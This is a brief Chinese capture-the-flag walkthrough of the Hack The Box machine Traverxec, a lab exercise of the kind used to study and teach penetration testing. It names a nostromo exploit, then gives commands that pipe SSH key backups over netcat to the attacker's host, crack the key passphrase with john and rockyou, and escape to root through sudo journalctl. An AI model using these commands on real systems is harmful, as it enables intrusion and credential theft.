Traverxec
Traverxec
常规扫端口:
nmap -A -sC 10.10.10.165
访问 80 端口,发现有个发邮件的功能
发现它的中间件是 nostromo 1.9.6
搜一下 exp
exp直接利用,得到 www-data 权限的 shell
看一下 /etc/passwd,发现有个叫 david 的用户
可以使用:python -c "import pty;pty.spawn('/bin/bash')"
来生成一个比较好看的终端样子,就像下面这样
cd 到 /var/nostromo/conf 看一下有啥,ls -al 起码要用 -a 啊,不要错过什么东西
cat 一下 nhttpd.conf ,发现了一个叫 public_www 的文件夹
进去看一下:
新开一个终端,nc -lvp 10001 >backup-ssh-identity-files.tgz 用来接收那个压缩包
shell 里面使用 nc 10.10.15.84 10001 < backup-ssh-identity-files.tgz
这样就把压缩包给下到本地 kali 机了
下载出来的文件里有 ssh 的密钥
使用 jhon 破解一下看看把
/usr/share/john/ssh2john.py /root/Desktop/home/david/.ssh/id_rsa > id_rsa.hash
先换成 jhon 能识别的格式
/sbin/john /root/Desktop/home/david/.ssh/id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
rockyou.txt 字典爆破一波
得到密钥密码,hunter
ssh 登录一波
拿到 user.txt
在 bin 目录下发现其他的东西
在窗口被拉小的时候会触发应用,可以获取root的权限
运行 /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service 时,把窗口缩小一点,再输入!/bin/sh,成功获得root权限:
惊了!?
参考:
https://ca0y1h.top/Target_drone/HackTheBox/3.HTB-Traverxec-walkthrough/
https://www.lofter.com/lpost/1df46e99_1c73cc6b6